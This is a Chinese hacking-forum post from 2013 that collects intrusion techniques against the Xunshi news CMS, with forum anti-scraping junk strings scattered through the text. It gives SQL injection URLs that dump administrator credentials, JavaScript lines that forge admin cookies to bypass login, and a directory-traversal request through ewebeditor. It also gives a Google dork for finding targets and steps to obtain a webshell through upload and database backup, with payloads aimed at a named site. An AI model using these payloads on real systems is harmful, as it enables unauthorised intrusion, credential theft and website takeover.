找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2517|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘1 T4 u; I8 j- l5 W: P
% [: w1 ~+ v) v2 i
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)0 @  x) b  O( Y

" y) m3 d4 ~9 s1 ^! e7 ]以下本文总结来自黑防去年第9期杂志上的内容...
# P# f  Y$ D; B
  g0 M, a0 m$ T* u% P* k0 E先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
5 I6 G3 a8 U5 W" s$ r) a  f2 O+ e' S- `, Q" p9 [
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 0 g- F7 {6 h- i

  d" y/ V( H9 w# u6 @0 p  b记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
6 Y) y' r3 m3 a* T( u# @这里一个注入+ j- k" u2 {! _& O2 K. y
' m# n& X8 \- d
效果如图:7 F9 h, e3 h( T# N

2 w- g& w3 s/ K # Z. k: N8 P5 V8 c  Q4 p4 _
6 K1 U' S3 y) x6 q7 g) S8 \3 |
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
' S8 a6 l% _1 I
3 P6 [3 _, o6 i6 K' e& V9 O+ K( H密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
. T3 ^4 W- h2 L! B# c( ]0 G
- P3 U8 y& ~- J; G% ijavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));# {' N  \( @8 _" b8 I

" M7 ~( L" k, f& T* |9 i那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:- h% `7 g( I' R8 i

* z+ a" w* T" x+ r因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞9 l' N2 _( t- o0 |& U1 d
+ U0 H( Q- N. R% l/ h! k/ e' _- a( k
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以5 ]' I5 v! s. I, }) a0 j! E
& x/ O7 h- P$ [/ O2 N
访问这页面来列目录..步骤如下:, f  Y& D% R' w# D- F7 Y6 x0 u; E
! j& o- `) v- t* z( c8 i
javascript:alert(document.cookie="admindj=1") ! P( w* j" C+ ^) ^+ _5 I5 r
6 g+ v9 a$ O/ `3 R& T: ?
http://www.political-security.co ... asp?id=46&dir=../..
* Q2 m2 o' X. ?' z
% q3 a1 l, B2 o. [, d2 {$ y效果如图:7 x, g" z" t* q- ?" y& Z2 w

" s! s& D( ?7 S  y3 f
, \2 N+ \/ w! t6 Q* ]) J0 R& S; F6 F, \( c  u4 h" Y; e. @6 D
这样全站目录都能瞧了..找到后台目录..进去..( T) h) o& s! j8 z( E+ D3 {7 ?, ~
- H# z1 I0 x$ x$ _. R
那么进了后台怎么拿shell??上传--备份就ok了..
. o0 Y# t$ g3 Z& ^
+ P- J0 Q9 O0 ?; u0 F那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..+ r: Q! T7 p6 n+ _

% K/ l3 q9 g8 C这个我也碰到过一次..你都可以通过列目录来实现..: Q( _( o- K4 Z. q) T5 f/ ^$ W3 w" k$ @
( B! l  K- v7 T3 J% F% f
javascript:alert(document.cookie="admindj=1")
! o; q! l; E9 J0 {+ m9 u% o( O0 e" t% @0 N1 ^- v% j% F
http://www.political-security.co ... p?action=BackupData
4 c- c% f9 @5 E( A) o) d0 c, j, Z
! V0 e' k& l- W( _1 x1 ^+ X, r  J备份ok..8 s7 B$ F: }0 d" E  z5 }

  g4 I* r# G/ d: x; C5 H那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
$ ^9 `) ?0 `8 p/ x# L$ S' U) B! N3 Y8 r* D+ ~: K1 E6 d
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下8 B3 L0 ?- x  D; h6 ]8 I! w( N
( L6 g/ H: s( p% h5 G& L& w
然后访问此页面进行注入..步骤如下:
( I' v7 Z+ X# d0 l, i: _3 l6 f# A5 `5 e1 y7 ?) c
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
) P" K( o2 w! V8 ~5 Z1 [! }' M: Z$ X* \8 X
然后请求admin/admin_chk.asp页面
7 b% ]6 Q/ e% K$ @' d- ]$ Q# Z6 r+ I* q
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%, j7 J9 b( K' }8 `1 }$ M

. C* R% p* l) s; I5 ]$ m" L26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin3 F' K+ ^/ x5 `: n  S
- g/ N6 q+ H6 t) r" D) q- u7 J' |
效果如图所示:
; e5 O* q8 V* W' B, Z+ C) T* _! g! \: y6 Y7 M$ L
% R3 g" R: H. \% K, j5 x

0 c0 H: B7 t+ |- \6 K3 h! R, J讯时漏洞2
& o% ~7 x5 Y# I, ?( \: j- {9 Zgoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
1 i' m' r* Z& S6 d. A8 [" }5 t. k0 A, Y
7 @, `  r3 {& W# J1、/admin/admin_news_pl_view.asp?id=14 p' m: y+ b3 R# J
//id任意 填入以下语句
) p. |' [  _) a* o
) x9 g) @9 G- ]2 I  D  a. c; d: N2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
) o9 n8 Y9 M5 d9 p" I 3 y) U! Z3 h& H$ `
7 R+ [4 a$ x9 e0 ^' K8 X
" F4 z, L- `% H  j7 D' Q
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='. t8 e' V( `( T5 }) A
- Q( H* [, h; K' V5 T5 k! g

) u( ~% F1 S/ y2 W- j$ l" U7 m1 u7 P. I) p" p
爆出管理员帐号和密码了4 P) b5 }4 u) X1 Y( A

& c$ Y+ Y; a* s
6 Q3 Z1 U: i) N9 \! |. B) q0 E3 O% w' m3 n
4、cookies进后台8 B3 j3 S8 o9 I  \- |

, [' {7 s5 |  j1 z' ?3 e3 Sjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));* M; ]+ @% o" L' `5 ]6 O

2 g6 H2 H3 `7 A# Q" O  E7 R- [( Y, r9 I! W$ R
" p# F; V9 ~8 g
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!' t' ~, r( H! j, y. D
* H7 t% e( x! V3 O4 ~" x- {2 f

6 l  L/ f5 G# R% L" U; O: c: s5 Z! `9 F" X- H0 y$ Z; `' K6 I2 ]
6、后台有上传和备份取SHELL不难。
/ \8 O! s5 k5 P5 m- h; _ 4 \2 t$ h0 ~& x6 V
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..3 [+ j5 I4 l; M6 m

" [4 G: ?* ]" X4 e逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
3 ^: P6 R5 k1 ~7 p( L* p7 A
1 M$ U2 `7 [  g4 f! N" T9 B
; ?0 M& {) r6 V! H. |9 W* `- k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表